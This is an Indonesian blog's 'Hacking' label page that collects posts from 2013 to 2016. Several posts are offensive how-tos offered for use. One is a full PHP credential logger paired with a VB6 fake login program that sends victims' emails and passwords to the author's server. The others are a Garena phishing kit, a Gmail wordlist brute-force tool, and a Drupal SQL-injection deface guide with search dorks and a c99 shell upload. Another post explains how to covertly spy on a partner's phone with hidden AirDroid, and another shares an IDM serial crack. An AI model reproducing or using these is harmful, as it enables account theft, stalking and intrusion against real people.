Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

Jumat, 10 Juni 2016


Setiap kali kita download IDM dari web web langganan kita , kebiasaan setelah instalasi dan aktivasi selesai maka saat kita cek data registrasinya pasti bukan atas nama kita sendiri kan ? pastinya data registrasi yang tertulis adalah nama dari web tempat kamu download . nggak asikk kan ... hehee

Kali ini kita akan memaparkan bagaimana agar IDM yang kita miliki akan ter registrasi atas nama sendiri .dengan satu syarat , kamu telah mendownload dan menginstall idm secara full version .

setelah sukses install full version , lalu kamu mau registrasi atas nama sendiri maka silahkan ikuti cara dibawah ini dengan benar .

1. pertama kali kamu Copy link ini :  
http://www.internetdownloadmanager.com/fillregform.html?d=cz1FTlRFUi1ZT1VSLS1QUk9EVS1DVEtFWQA=

2. buka idm dari dekstop lalu klik tomboll add url(dipojok kiri atas) , lihat gambar :


3. maka link yang tadi kamu copy secara otomatis ter paste dalam jendela dialog yang nongol seperti gambar dibawah ini lalu klik 'ok"


4. setelah itu akan tampil jendela registrasi seperti berikut :


5. Isi nama depan dan belakang sesukamu isi juga email sembarang , isikan juga serial numbernya lalu klik ok , kemudian klik continue


6. selesai , idm sudah ter registrasi atas nama sendiri !


Jika tertarik , silahkan download serial numbernya melalui salah satu link dibawah ini 

VIA GOOGLEDRIVE
DOWNLOAD =>> SERIAL NUMBER IDM
FILE SIZE : 5 KB

VIA USERSFILES
DOWNLOAD =>> SERIAL NUMBER IDM
FILE SIZE : 5 KB

Password RAR : www.mufashi.blogspot.com

STATUS : TESTED !

Selasa, 05 April 2016


Israel adalah salah satu negara yang paling dibenci oleh grup hacker Anonymous, terutama akibat aksi-aksinya pada Palestina. Oleh karena itu, setiap tahun hacker Anonymous tidak pernah absen menyerang Israel. Dan tahun ini, jadwalnya sudah di depan mata.

Sejak tahun 2013 lalu, Anonymous selalu melancarkan serangan siber pada Israel pada tanggal 7 April dengan tujuan menghilangkan Israel dari dunia maya. Operasi ini disebut dengan #OpIsrael Cyberattack.

Mengingat 7 April sudah dekat, pemerintah dan berbagai organisasi di Israel mulai merapatkan barisan dan menambah perlindungan sistem keamanan siber mereka. Selain itu, saat ini di Jerusalem sedang di adakan Cyber Hackathon yang diikuti oleh 400 hacker.

Ratusan hacker ini menjalani simulasi untuk membendung serangan hacker dari Anonymous. Simulasinya beraneka ragam, mulai dari peretasan komputer, lampu lalu lintas, bandara, sampai pembangkit listrik.

Namun, banyak pakar keamanan siber di Israel yang justru menanggapi santai serangan Anonymous itu. Hal ini diakibatkan oleh minimnya dampak serangan hacking yang dilancarkan Anonymous tahun lalu. Pertanyaannya, apakah tahun ini akan sama?

Sabtu, 27 Februari 2016

Bagi kamu yang punya pacar, pernah gak sih merasa curiga dan penasaran dengan aktivitas yang dilakukan pacar kamu lewat Androidnya?




Jika iya, kali ini saya akan memberikan tutorial untuk menyadap Android pacar kamu tanpa perlu akses root. Mau tahu caranya?

Dengan menyadap Android pacar kamu, nantinya kamu bisa mengetahui siapa saja yang mengirim SMS, BBM, WhatsApp, email, hingga panggilan yang masuk ke Android miliknya. Tapi ingat, gunakan cara menyadap Android pacar ini dengan bijak ya!


Cara Menyadap Android Pacar Tanpa Root
Keuntungan Android yang sudah di root memang menjadi leluasa menggunakannya.

Banyak cara root Android, tapi mungkin kamu sayang garansi jika Android kamu di-root. Nah, dengan menggunakan aplikasi AirDroid, kamu bisa menyadap dan memata-matai Android pacar kamu loh!

Install AirDroid

Untuk mulai menyadap atau memata-matai Android pacar kamu, yang harus kamu lakukan adalah menginstal aplikasi AirDroid di smartphone pacar kamu.

Lalu silakan daftar akun baru, atau gunakan akun yang lama jika kamu memiliki akun AirDroid sebelumnya.

Selanjutnya, jangan lupa menginstal AirdDroid Desktop juga di PC kamu. Dan log in menggunakan akun yang sama dengan yang digunakan di AirDroid pada Android pacar kamu.


Aktifkan Mirror Notifications Pada AirDroid
Fitur AirDroid yang akan kita gunakan untuk menyadap Android pacar adalah fitur Mirror Notifications. Dengan fitur ini memungkinkan notifikasi yang masuk ke Android akan muncul di AirDroid desktop kamu yang terhubung dengan akun yang sama.

Untuk mengaktifkan fitur Mirror Notifications di AirDroid, kamu harus memberikan AirDroid akses ke notifikasi di Android kamu. Caranya, masuk keSettings > Notification > Notification Access. Centang pada bagian AirDroid Notification Mirror. Selesai tahap persiapannya.


Instal Hola Launcher di Android Pacar Kamu
Jika tahap pengaturan AirDroid sudah selesai, selanjutnya install Hola Launcher di Android pacar kamu. Saat ditanya kenapa Hola Launcher, bilang aja kalo Hola Launcher itu ringan dan gampang dikustomisasi. Dengan banyaknya tema dan fitur baru yang ditawarkan, gak mungkin banget kalo pacar kamu gak mau download Hola Launcher.

Perlu diketahui, salah satu fitur menarik dari Hola Launcher adalah kemampuan untuk menyembunyikan aplikasi, dan menguncinya. Jadi, segera setelah menginstal Hola Launcher, silakan kamu sembunyikan aplikasi AirDroid yang terinstal pada Android pacar kamu. Atau kamu bisa menggunakan aplikasi lain untuk menyembunyikan AirDroid-nya.


Penyadapan Dimulai!
Jika semua persiapan sudah selesai, sekarang menyadap Android pacar kamu pun bisa dimulai. Kamu sudah bisa mengetahui isi chat dan telepon siapa saja yang masuk ke Android pacar kamu. Selama Android pacar kamu terhubung dengan internet, kamu bisa terus mengecek notifikasi yang masuk ke Android pacar kamu lewat AirDroid Desktop kamu. Atau kamu juga bisa menggunakan web http://web.airdroid.com/

Nantinya kamu akan mengetahui semua aktivitasnya. Misal berkali-kali unlock kunci, BBM siapa yang masuk, WhatsApp siapa yang masuk, SMS, email, aktivitas browser hingga panggilan telepon. Aplikasi seperti WhatsApp bahkan bisa kamu balas lewat AirDroid Desktop saat ada notifikasi yang masuk. Keren bukan?

Bahkan kamu juga bisa mengakses file-file yang ada di Android pacar kamu. Bukan cuma mengakses file, kamu bisa mengaktifkan kamera pacar kamu dari jarak jauh tanpa diketahui pacar kamu. Menariknya, pacar kamu tidak akan tahu bahwa aplikasi kameranya sedang kamu gunakan. Jadi kamu bisa tahu dia beneran ada di suatu tempat atau nggak dengan mengintip lokasinya dari kamera.

Nah, sekarang kamu sudah tahu kan cara menggunakan AirDroid sebagai aplikasi untuk memata-matai Android pacar? Aplikasi yang awalnya digunakan untuk memudahkan kamu terhubung antara perangkat smartphone Android dengan PC ternyata malah bisa digunakan sebagai aplikasi menyadap Android. Kesimpulannya, semua berbalik lagi ke niat penggunanya.

Minggu, 21 Februari 2016

Source: 3.bp.blogspot.com

Selamat Pagi Sahabat
kali ini mimin mau memposting "Tutor Hack Gmail"
No bacod again :v
Cekidot...
Tutor Hack Gmail
Bahan-Bahannya

Python -2.7.3 download Disini
Aplikasi Hack Gmail Download Disini
Mechanize Download Disini
#Cara install Mechanize nya : Masuk ke CMD (c:\Mechanize enter,lalu ketik "install.py")jangan make tanda petik

note : Install Dlu Pythonnya


Langkah-Langkah
1) Download dlu bahan" lalu simpan python di direktori C:
2) simpan file tools hack Gmailnya di D:
3) Kemudian Buka terminal anda(Command Prompt/CMD)
4) Setelah itu jalankan toolsnya
    Cara :ketik "D:" note jngan make petik

note : Install Dlu Pythonnya


Langkah-Langkah
1) Download dlu bahan" lalu simpan python di direktori C:
2) simpan file tools hack Gmailnya di D:
3) Kemudian Buka terminal anda(Command Prompt/CMD)
4) Setelah itu jalankan toolsnya



    Cara :ketik "D:" note jngan make petik
            
            


Ketik "cd gmail"


Lalu tulis gmail.py


5) Setelah itu jalankan toolsnya dengan mengetik gmail.py lalu enter,lalu masukan email korban dan masukan juga nama file password list yang isi nya kumpulan dari bnyak wordlist
6) Kalo seandainya mas bro mengalami error saat menjalankanya silahkan install mechanize
7) Setelah menunggu beberapa menit ketemu dah passwordnya
8) Nah tinggal login ke Gmailnya ^_^
Hasilnya



Note : Semakin banyak wordlistnya semakin bagus


"INGGAT!! JANGAN DI SALAH GUNAKAN!!!!!!!!"

Hetalia: Axis Powers - Iceland

Senin, 12 Oktober 2015

Selamat siang gan., di Siang hari ini saya akan share script phising PB Garena.karena saya lihat banyak teman2 saya yg bermain PB garena di Warnet jadi saya ingin membuatnya dari 0., karena saya lihat di google script phising nya sama tidak ada yang lain.dan saya berniat untuk membuat script phising ini dengan tangan saya sendiri.,dan puji Allah berhasil.,

oke langsung aja gan kita lihat tampilan depan nya..



tampilan jika para ikan telah login.,


tampilan resultnya.,


Cara Penggunaan :
1.Kalian extra file .zip nya
2.Cari mail.php ganti dengan email kalian


Kalian juga bisa mengedit script itu sesuka hati kalian., tapi ingat jangan sampai ganti copyright nya ya., karena udah banting tulang nih saya buat nya :v

Hargai Karya Orang ^_^


oke yg mau download silahkan download aja di SINI


Oke sekian Terima Kasih. ^_^

Sperm

Rabu, 07 Oktober 2015

  Salah satu operator seluler kenamaan asal Amerika Serikat, T-Mobile, tengah tertimpa masalah yang cukup serius. Salah satu partner mereka, Experian, servernya telah diretas.



Akibat kejadian ini, data pelanggan T-Mobile dipastikan telah dibobol, diperkirakan ada sekitar 15 juta data pelanggan T-Mobile terkena imbasnya.

Data yang telah diretas tersebut mencakup informasi pribadi, seperti nama, tanggal lahir, alamat, dan nomor jaminan sosial pelanggan. Namun untungnya, informasi keuangan seperti kartu pembayaran atau informasi perbankan masih aman.

"Jelas saya sangat marah tentang pembobolan data ini dan kami akan melakukan kajian secara menyeluruh dengan Experian. Tapi sekarang fokus pertama kami adalah membantu setiap dan semua data konsumen. Kami sangat mengutamakan privasi pelanggan. Ini bukan masalah kecil bagi kita," kata CEO T-Mobile, John Legere.

Experian adalah perusahaan yang memproses aplikasi kartu kredit T-Mobile, sehingga ini adalah kabar yang cukup melegakan karena tidak ada informasi keuangan yang dicuri.

Sharingan 3 - Naruto

Selasa, 06 Oktober 2015

Hai! Kamu pasti sudah sering mendengar yang namanya virus kan? Di sini saya akan memberi salah satu virus yang paling sederhana, dan hanya menggunakan Notepad pada PC/Laptop milikmu. Virus ini bisa di bilang adalah virus yang sangat gampang dibuat serta sangat mudah. Pengen tau cara membuat virusnya? Cekidot!



1. Buka Notepad kamu, pilih Start Windows, lalu ketik "Notepad".


2. Selanjutnya, kamu ketik "start" huruf kecil semua.


3. Terserah kamu mau menulis "start" sebanyak apapun, itu yang nantinya akan menjadi virus sederhana. Jika sudah sekarang "save as".


4. Pilih file, lalu cari save as. Jika sudah klik. Beri nama sesuai keinginan kamu. Tapi jangan lupa, kamu harus memberi tambahan lagi di belakang kata yang akan kamu beri yaitu ".bat", contohnya virus.bat atau ayam.bat. Jika sudah pilih save.


5. Jika sudah, saatnya kamu buka file .bat yang telah kamu buat tadi. Dan jangan lupa, untuk membuat virus ini, kamu harus men-disable anti virus yang galak.


6. Klik kanan Run as administrator.


7. Dan lihat apa yang terjadi.


8. Selamat, kamu sudah bisa membuat virus sederhana. Jika masih kurang banyak command prompt yang keluar, tenang saja. Kamu masih bisa menambah command prompt dengan banyak lagi. Klik kanan virus yang kamu buat tadi, pilih edit.


9. Buatlah sesuai keinginan kamu, dengan tambahan tulisan "start" sebanyak apapun, tapi ingat, ini berdampak resiko yang cukup tinggi. Salah satunya, PC/Laptop kamu nge-lag, lemot, bahkan hang.


10. Jika sudah kamu tambah tulisan "start" nya. Lakukan hal di atas. Save dan bukalah virus yang kamu save tadi.




Wow! sangat banyak command prompt yang keluar. Itu tergantung banyak tulisan "start" yang kamu buat di Notepad tadi. Selamat mencoba!
Chinese Characters, Success

Senin, 05 Oktober 2015

Hacking atau peretasan boleh dibilang menjadi salah satu hal yang ditakuti para pengguna internet (netter). Mengapa demikian, karena jika akun e-mail
atau situs jejaring sosial mereka diretas, data-data pribadinya bisa beralih ke tangan-tangan yang tidak bertanggung jawab.



Jika ditelusuri lebih lanjut, peretasan bukan hanya terjadi karena kepiawaian si peretas atau hacker. Sebab pada kenyataannya, keteledoran netter juga menjadi celah yang menyebabkan mereka menjadi korban peretasan.

1. Menggunakan password yang sama untuk beberapa akun

Anda harus menghindari penggunaan password atau kata kunci yang sama untuk beberapa akun. Meski penggunaan password yang sama tampak menjadi ide bagus supaya Anda tidak perlu bersusah payah mengingat-ingat banyak passwords, di sudut pandang para hacker, hal itu justru sangat menguntungkannya.



Terang saja, jika satu akun berhasil diretas, password yang sama di akun-akun lainnya akan dengan mudahnya diakses oleh si hacker. Karenanya, pilihlah password unik dan kuat bagi masing-masing akun untuk mencegah hal itu terjadi.

2. Menggunakan enkripsi jaringan nirkabel yang lemah 

Jika Anda memiliki jaringan nirkabel di rumah Anda dan tidak mengenkripsinya, atau menggunakan enkripsi yang lemah, pada dasarnya Anda membiarkan siapa pun memiliki akses ke koneksi internet Anda. Di samping itu, Anda juga telah 'membantu' para hacker dengan membuka jalan bagi mereka untuk memata-matai lalu lintas jaringan Anda atau melakukan hal-hal buruk lainnya di koneksi internet Anda.



Akan tetapi, jika misalnya Anda telah mengaktifkan enkripsi, boleh jadi enkripsi yang Anda gunakan adalah enkripsi berbasis WEP yang usang dan sangat mudah diretas. Enkripsi WEP memang dikenal mudah diretas oleh sebagian besar hacker dan tidak terlalu berperan dalam memberi perlindungan dari hacker. Karena itu, pertimbangkan untuk menggunakan enkripsi berbasis WPA 2 dengan SSID name dan kata kunci jaringan nirkabel yang dapat disetel.

3. Menanggapi pesan pop-up dan atau e-mail tidak dikenal

Mengklik tautan di dalam e-mail yang tidak dikenal dan pesan pop-up adalah cara yang sangat cepat untuk membuat komputer Anda terinfeksi malware. Karena itu, sebaiknya Anda perlu menaruh kecurigaan tinggi terhadap e-mail yang tidak Anda kenal.



Bahkan pesan pop-up yang tampak tidak berbahaya mungkin merupakan sebuah usaha untuk memancing Anda mengklik. Oleh sebab itu, Anda perlu mengaktifkan fitur pemblokiran pop-up pada peramban (browser) Anda dan juga mempertimbangkan menggunakan plug-in seperti NoScript untuk melindungi diri dari pop-up berbahaya.

4. Menggunakan OS dan Aplikasi yang tidak diberi patch

Memasang patch keamanan secara tepat waktu sangat penting. Hacker dan penjahat dunia maya lainnya mengandalkan fakta bahwa banyak korban potensial mereka cenderung memiliki sistem yang tidak diberi patch, sehingga kerentanannya lebih tinggi. Hacker akan mengeksploitasi kerentanan untuk mendapatkan akses masuk ke komputer korbannya. Sebetulnya serangan semacam ini sering kali dapat dicegah, jika penggunanya menambal sistemnya dengan patch keamanan terbaru.



Aktifkan fitur 'auto-update' di sistem operasi Anda, sehingga komputer Anda secara otomatis dapat memasang patch keamanan segera setelah patch itu tersedia dari vendor sistem operasi Anda. Kemudian, tentukan pengingat kalender berulang untuk memeriksa update keamanan program atau aplikasi Anda lainnya. Waspadalah, terutama dalam mengelola aplikasi dan browser plug-in yang memiliki banyak interaksi dengan internet, seperti Adobe Flash, Acrobat, Java, dan sebagainya.

5. Mematikan Fitur Keamanan

Kadang-kadang pengguna menonaktifkan seluruh firewall di komputer mereka karena mengalami kesulitan dengan aplikasi tertentu yang terhubung ke internet. Karena itu, sebaiknya firewall cukup dinonaktifkan satu kali saja supaya program atau aplikasi yang dimaksud dapat berfungsi. Selanjutnya, pengguna mungkin lupa mengaktifkan kembali firewall setelah mereka selesai menggunakan aplikasi itu, atau mereka mungkin memutuskan bahwa masalah yang mereka kira disebabkan oleh firewall tidak sebanding dengan perlindungan yang ada.



Pada perlindungan antivirus, kadang-kadang fitur lainnya yang sering dimatikan di komputer. Beberapa orang mematikannya dengan harapan bahwa mematikan antivirus akan meningkatkan kinerja komputer untuk menjalankan permainan atau aplikasi lainnya yang memakan banyak sumber daya. Padahal, fitur keamanan ini melindungi komputer dan data dari bahaya. Antivirus sangat penting untuk keamanan secara keseluruhan, sehingga menghapus atau menonaktifkannya sama saja dengan menyingkirkan pintu depan rumah Anda hanya karena Anda tidak suka pintu Anda mengeluarkan bunyi berderit-derit.

Jika fitur keamanan atau aplikasi menyebabkan masalah, cobalah untuk menemukan akar masalahnya, bukan hanya menonaktifkan perlindungan Anda. Jika pemindai virus Anda memperlambat sistem Anda, pertimbangkan pemindaian sistem yang terjadwal di tengah malam, ketika Anda tidak menggunakan komputer Anda.
(Lagi) Website Polri Diretas oleh Hacker Indonesia
Hello agan semua, pada kesempatan kali ini Admin, akan membagikan sebuah informasi mengenai (Lagi) Website Polri Diretas Hacker Indonesia.

  Mengapa Saya Mengatakan Lagi??

Karena bukan kali ini saja website Polri Itu Diretas Oleh Hacker, bahkan sudah banyak hacker yang telah menampakkan namanya di website Polri ini, dan yang paling mencengakan, ternyata Bug Yang Dilakukan Para Hacker Tetap dengan memanfaatkan Celah dari Sql Website tersebut. 

Dan Sekarang Kawan Dari Sec7or Team yang beraksi, yang memiliki nick Minato yang menampakan dirinya di Website Besar Polri tersebut.

Link dari tempat Script ditanam http://polri.go.id/foto_berita/
Semoga, ini adalah yang terakhir website Polri dijebol Hacker, semoga kedepannya WebMaster nya dapat menutup bug nya.

Sekedar Informasi, Sec7or Team adalah sebuah team Hacker yang cukup aktif dan hebat pada masa kini, beberapa bulan yang lalu pun Anggota dari Sec7or Team yang memiliki nick i3r_Cod3 berhasil membobol website Revolusi Mental, sebuah website yang sempat menjadi perbincangan hangat karena harga nya pembuatannya yang fantastis.



Jumat, 25 September 2015


Mungkin teman-teman sekalian udah tahu apa itu phishing ? kali ini teknik phishing-nya kita Lakukan pada sebuah program desktop:D ( biasanya kan Lewat situs Hotsting  :3 )

Sebelumnya baca dulu nih Kawan sebagai contoh-nya :
 Ada sebuah program kita sebut saja cheat Clash Of Clans Di Android
program itu akan menyuruh anda untuk login ke Email menggunakan program tersebut,apabila ingin membuat cheatnya bekerja.
user yang tertipu akan login lewat program tersebut
di dalam program tersebut terdapat 2 buah textbox dan 1 buah command button.

2 textbox itu adalah penampung Email & Password yang akan di kirim ke server kita dan command buttonnya di gunakan untuk meng eksekusi code,setelah code di eksekusi program akan memanggil sebuah file .php yang telah di buat sebelumnya di server kita
file php yang telah di panggil tersebut bertindak mencatat ip korban pengirim,mencacat tanggal pemanggilan file php,dan mencatat Email & Password korban yang telah di masukan di 2 buah textbox yang ada di program tersebut lalu menyimpannya dalam sebuah file text.

Mengerti-kan dengan cara kerja program ini ?

Siapkan Dulu Alat-Alat Nya :

? Program Visual Basic 6.0
? Hostingan Free / Yang Berbayar
? Cemilan [ bila kalian lapar ]
? Doa [ biar berjalan lancar kita membuat program nya ]

Oke,langsung aja  kita praktekkan


1. Nah Sekarang Buka Notepad Kalian all Progam > Accsesories > Notepad

Copy Kan Code Berikut Ke Notepad Kalian

? <?php
$datum=date(?d-m-Y / h:i:s a?);
$email = $_GET[e];
$password = $_GET[p];
$ip = getenv (?REMOTE_ADDR?);
$fl = fopen(?Ihiy.txt?, ?a?);
fwrite($fl, ?IP Address : $ip\nDate : $datum\nUsername : $email\nPassword : $password\n\n?);
fclose($fl);
$ref = $_SERVER[?HTTP_REFERER?];
header(?location: $ref?);
?> ? ( tanpa kutip dua tentunya )

simpan kode tersebut dengan nama opxinside.php (cara simpannya : pilih file types -> all files )

Dan Buat Notepad Kosongan Simpan Dengan nama hasil.txt
Upload file opxinside.php dan hasil.txt Di WebHosting Kalian

Cara Upload Nya Cari Di Gogle Banyak

2. Buka Vb.Net nya

3. siapkan form dan module,


  • form diberi nama = frmUtama
  • module diberi nama = modConnect               


  • form diberi nama = frmUtama
    4. Masukan kode ini di modconnect ? Public Declare Sub Sleep Lib ?kernel32?

    Private Declare Function InternetGetConnectedState Lib ?wininet.dll? (ByRef _
    lpSFlags As Long, ByVal dwReserved As Long) As Long
    Const INTERNET_CONNECTION_MODEM = 1
    Const INTERNET_CONNECTION_LAN = 2
    Const INTERNET_CONNECTION_PROXY = 4
    Const INTERNET_CONNECTION_MODEM_BUSY = 8

    ?Fungsi yang berguna untuk mengecek koneksi internet yang ada di komputer kita menggunakan fungsi api InternetGetConnectedState
    Function CekInternet(Optional connectMode As Integer) As Boolean
    Dim flags As Long
    CekInternet = InternetGetConnectedState(flags, 0)
    connectMode = flags
    End Function ? tanpa kutip dua ya

    5. di frmUtama masukan 2 textbox, 1 command button dan 1 label
    textbox pertama diberinama : txtUname
    textbox kedua diberinama : txtPass

    command button diberi nama : cmdLogin
    command button diberi caption : &Login

    label diberi nama : LBLInfo

    masukan kode ini kedalam form  ? Private Sub Form_Load()
    lblInfo.Caption = ?Memeriksa Koneksi Internet?
    If CekInternet = False Then
    lblInfo.Caption = ?Komputer Anda Tidak Terkoneksi Ke Internet !?
    Else
    lblInfo.Caption = ?Komputer Anda Terkoneksi Dengan Internet?
    Me.Caption = ?Captionnya terserah kalian mau nama apa aja?
    End If
    End Sub

    6. nah setelah itu klik 2x cmdLogin yg telah diberi caption Login tadi, dan masukan kode ini
    ? Dim user, pass As String
    Dim IE As Object
    user = LCase(txtUname.Text)
    pass = txtPass.Text

    If txtUname.Text = ?? Then
    MsgBox ?Kotak Teks masih kosong,silahkan isikan dengan benar !?, vbExclamation, ?Error?
    Else
    lblInfo.Caption = ?Sedang Login ??
    Set IE = CreateObject(?InternetExplorer.Application?)

    IE.Visible = 0
    IE.Navigate ?http://www.domainkamu.com/opxinside.php?e=&#8221; & _
      user & ?&p=? & pass

    Do While IE.Busy
    Sleep 200 ?sleepnya 200 ajah :p

    Loop
    IE.Quit
    Set IE = Nothing

    lblInfo.Caption = ?Username/Password Salah !?
    MsgBox ?Username/Password Salah !?, vbExclamation, ?Error?
    End If ?

    nah kalo sudah, pilih file -> make Project .exe
    selesai deh, tinggal disebar aja, ini bisa buat kaskus, pesbuk, bahkan twitterpun bisa

    Nah Cara Lihat Hasil Nya Tinggal cari di Kotak Pencaian

    Contoh : https://domainkamu.com/hasil.txt

    Nih Buatan Ane Sendiri  DOWNLOAD

                    PASS : java-intelegent.blogspot.co.id

    TERIMA KASIH

    Sabtu, 19 September 2015

    Pada kesempatan kali ini di artikel ini saya akan menjelaskan Cara deface dengan Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell.

    Siapkan bahan-bahannya :

    1. Drupal Exploiter (Download)
    2. C99 Shell (Download)

    Biasanya akan berhasil jika menggunakan shell c99

    Langkah-Langkahnya antara lain :

    1. Simpan tools exploit diatas dengan ekstensi php dan simpan di hostingan atau di localhost.


    1. Google dork;

    intext:"powered by drupal" site:id atau inurl:"node/add/article" site:id

    2. Masukkan target dan tekan tombol "suck it ! " (jika berhasil penampakannya seperti dibawah ini)


    3. Masuk ke url http://site.com/user/login
    dan masukkan
    user : fuckyou
    pass : admin


    4. Lalu masuk ke http://site.com/node/add/article

    ( masukkan source backdoor nya dan Ubah format nya ke PHP Code )


    lalu scroll kebawah, dan klik save


    Dan anda akan langsung di direct ke shell anda


    Setelah itu terserah anda.

    Resiko dan konsenkuensi lainnya kembali pada anda, selamat belajar.

    Senin, 01 September 2014

    Tutorial cara rooting XIAOMI MI3
    Dalam Tutorial cara rooting XIAOMI MI3 ini terdapat dua metode, yang pertama adalah menginstall terlebih dahulu CWM Recovery lalu kemudian baru menginstall binary superuser nya lewat CWM. Kemudian metode yang kedua adalah langsung menginstall superuser dari aplikasi Updater MIUI.





    Metode 1
    1. Download  bahan-bahannya disini Rooting_xiaomi_mi3_metode1.zip
    2. Ekstrak file tersebut, di dalam file tersebut terdapat dua file yaitu update.zip dan Root CWM flashable.zip
    3. Copy file update.zip dan Root CWM flashable.zip ke direktori root / terluar sdcard XIAOMI MI3 anda. Kemudian buka aplikasi updater MIUI, pilih menu, dan browse ke file update.zip, dan lakukan update. Setelah itu lakukan reboot.
    4. Matikan Xiaomi mi3 anda, dan nyalakan kembali dengan menekan tombol volume up + power sec ara bersama selama 4-5 detik, sampe keluar menu CWM Recovery.
    5. Setelah itu masuk CWM, lakukan install zip from sdcard, pilih Root CWM flashable.zip . Kemudian reboot.
    6. Buka aplikasi Security, dan masuk menu Permission > Root permission, dan aktifkan fitur tersebut.
    7. Selamat, Xiaomi mi3 anda sudah mendapat akses root. setelah itu tinggal install aplikasi root, seperti superuser atau superSU.

    Metode 2
    2. Ekstrak file tersebut, di dalam file tersebut terdapat dua file yaitu root v23 dan unroot v23
    3. Rename root 23.zip menjadi update.zip dan Copy ke direktori root / terluar sdcard XIAOMI MI3 anda. Kemudian buka aplikasi updater MIUI, pilih menu, dan browse ke file update.zip, dan lakukan update. Setelah itu lakukan reboot.
    4. Setelah reboot buka aplikasi Security, dan masuk menu Permission > Root permission, dan aktifkan fitur tersebut.
    5. Selamat, Xiaomi mi3 anda sudah mendapat akses root. setelah itu tinggal install aplikasi root, seperti superuser atau superSU.


    Senin, 30 Desember 2013

    Rooting Android Dengan Cydia Impactor


    Mungkin sebelumnya ane pernah posting tentang cara rooting android dengan beberapa cara, diantara nya adalah sebagai berikut :
    Rooting Sony XPERIA E Dual (untuk xperia e / device xperia)
    Cara Rooting Xperia E dual Firmware 11.3.A.1.39 (untuk xperia e dual dengan firmware 11.2.A.1.39)
    Rooting Android dengan SRSRoot (hampir semua device android)
    Cara Rooting Samsung Galaxy S4 (untuk samsung galaxy s4)

    Masih banyak lagi tools/aplikasi untuk mendapatkan root di android, seperti Framaroot (rooting langsung dari HH) , atau bisa dengan SuperOneClick. dan aplikasi-aplikasi atau exploit-exploit lain yang banyak beredar di internet untuk Rooting. Memang sih, gak semuanya bisa/berhasil untuk diterapkan di device yang berbeda-beda. layaknya pepatah "Banyak jalan menuju Roma". Begitu juga dengan Android. "Banyak Jalan Menuju Akses Root". Jadi jangan menyerah. kalo pake ini ga berhasil, coba pake itu, kalao pake itu ga berhasil, coba pake yang lain.

    Pada tutorial kali ini, ane mau ng'bahas tentang aplikasi Rooting menggunakan Cydia Impactor . Apa aja yang mesti dilakuin ? Berikut langkah-langkahnya :

    1. Download Cydia Impactor atau bisa juga download disini
    2. Ekstrak file zip diatas.
    3. Aktifin USB Debungging (Setting > Developer Options > centang USB Debugging) di HH.
    4. Sambungin HH ke PC/Laptop
    5. Masuk ke folder Cydia Impactor
    6. Disitu ada file bernama Impactor.exe , run file tersebut dengan cara double klik pada file itu. Akan muncul seperti ini, kemudian klik Start.

    Rooting Android Dengan Cydia Impactor


    7. Tunggu sampai proses exploitnya selesai. 
    8. Setelah selesai, sekarang tinggal kita install aplikasi superuser atau superSU. bisa didownload di playstore.
    atau bisa juga download dibawah ini :

    Selesai.